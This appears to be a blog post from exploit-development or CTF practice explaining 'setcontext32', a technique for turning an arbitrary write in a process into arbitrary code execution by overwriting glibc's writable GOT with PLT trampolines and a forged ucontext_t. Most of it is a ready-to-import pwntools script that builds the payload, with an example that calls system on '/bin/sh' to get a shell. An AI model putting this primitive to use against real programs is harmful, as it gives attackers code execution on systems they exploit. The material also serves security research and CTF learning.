Currently, converting an arbitrary write primitive into RCE is a messy process.
The good old days of __free_hook are long gone; now you’ve got to leak the ptr
mangling cookie to modify an existing __exit_funcs entry, maybe compute the
offset to ld.so to overwrite l_addr and create a fake DT_FINI entry, or
perhaps setup special _codecvt and _wide_data structures on hijacked IO
objects… I’d just like to specify the function I want to call and its
arguments!
I want a flexible RCE primitive. I don’t want to rely on _IO_cleanup,
_dl_fini, or malloc to call my injected code. I want an inherently universal
gadget, a gadget I can expect to be called with the most messed up heap bins and
broken IO objects. I want to be able to call any function with any set of
arguments without needing to stack pivot or pray system is stack aligned. I
don’t want to satisfy several constraints so one_gadget will work!
setcontext32 is a neat method to convert arbitrary write to flexible arbitrary code execution. Roughly, it looks like:
write(libc_write_address, flat(
p64(0),
p64(libc_write_address + 0x218)
p64(setcontext+32),
p64(libc_exe_address) * 0x40,
cpu_state_information,
))
Where libc_write_address is the start of the writeable page in libc,
libc_exe_address is the start of the executable page in libc, and
cpu_state_information is a structure that contains all current registers,
including rsp and rip.
Every GOT entry in libc such as memset, memcpy, strcpy, and strlen is
replaced with the PLT trampoline, which starts at the beginning of the
executable page. The PLT trampoline pushes a fake linkmap,
libc_write_address + 0x218, and calls a fake runtime resolver,
setcontext+32, all of which starts at the beginning of the writeable page.
setcontext+32 pops libc_write_address + 0x218 off the stack, and treats it
as a pointer to a saved ucontext_t. It’ll then load your structure as the
current CPU state.
Calling most libc functions will trigger setcontext32, including malloc,
exit, and (almost?) every IO operation.
libc’s GOT is writeable so that you may use architecture specific functions,
such as memcpy optimized for SSE or AVX512. A friend also guessed that it
could be for ltrace. I learned the libc GOT was writeable from pwndbg creator
disconnect3d.
Here’s code you can readily import to generate setcontext32 payloads (or
integrate into your pwn libraries). An example is below. setcontext32.py
from pwn import *
def create_ucontext(
src: int,
rsp=0,
rbx=0,
rbp=0,
r12=0,
r13=0,
r14=0,
r15=0,
rsi=0,
rdi=0,
rcx=0,
r8=0,
r9=0,
rdx=0,
rip=0xDEADBEEF,
) -> bytearray:
b = bytearray(0x200)
b[0xE0:0xE8] = p64(src) # fldenv ptr
b[0x1C0:0x1C8] = p64(0x1F80) # ldmxcsr
b[0xA0:0xA8] = p64(rsp)
b[0x80:0x88] = p64(rbx)
b[0x78:0x80] = p64(rbp)
b[0x48:0x50] = p64(r12)
b[0x50:0x58] = p64(r13)
b[0x58:0x60] = p64(r14)
b[0x60:0x68] = p64(r15)
b[0xA8:0xB0] = p64(rip) # ret ptr
b[0x70:0x78] = p64(rsi)
b[0x68:0x70] = p64(rdi)
b[0x98:0xA0] = p64(rcx)
b[0x28:0x30] = p64(r8)
b[0x30:0x38] = p64(r9)
b[0x88:0x90] = p64(rdx)
return b
def setcontext32(libc: ELF, **kwargs) -> (int, bytes):
got = libc.address + libc.dynamic_value_by_tag("DT_PLTGOT")
plt_trampoline = libc.address + libc.get_section_by_name(".plt").header.sh_addr
return got, flat(
p64(0),
p64(got + 0x218),
p64(libc.symbols["setcontext"] + 32),
p64(plt_trampoline) * 0x40,
create_ucontext(got + 0x218, rsp=libc.symbols["environ"] + 8, **kwargs),
)
if __name__ == "__main__":
libc = ELF("./libc.so.6")
dest, payload = setcontext32.setcontext32(
libc, rip=libc.sym["system"], rdi=libc.search(b"/bin/sh").__next__()
)
print(hex(dest), payload.hex())